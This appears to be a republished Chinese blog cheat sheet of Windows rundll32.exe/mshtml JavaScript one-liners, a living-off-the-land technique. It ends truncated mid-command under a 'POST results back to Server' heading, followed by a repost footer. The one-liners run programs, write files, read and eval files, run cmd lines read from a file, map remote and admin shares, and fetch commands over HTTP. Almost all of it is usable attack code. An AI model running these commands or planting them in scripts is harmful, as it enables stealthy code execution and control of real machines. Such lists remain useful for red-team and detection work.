![]()
//Execute A Command
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
new%20ActiveXObject("WScript.Shell").Run("calc");
|
//Write To A File
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
fso=new%20ActiveXObject("Scripting.FileSystemObject");
a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);
a.WriteLine("Test");a.Close();self.close;
|
//Read and Execute From A File
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();fso=new%20ActiveXObject("Scripting.FileSystemO
bject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval
((f.ReadAll()));
|
//Map A Remote Share (WEBDAV)
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive
("S:","https://live.sysinternals.com");self.close;
|
//Map A Local Share
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive
("S:","\\\\Localhost\\c$");self.close;
|
//Read and Execute Commands From A File
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();fso=new%20ActiveXObject("Scripting.FileSystemOb
ject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while
(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");
t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);};
|
//Retrieve Commands From HTTP
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();
B=h.ResponseText;alert(B);
|
//POST results back to Server
1
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();h=new%2
|
文章出处:Evi1cg's blog
原文链接:https://evi1cg.me/archives/121.html
![]( "微信公众号文章素材之分割线大全")
![]()
微信扫码咨询专知VIP会员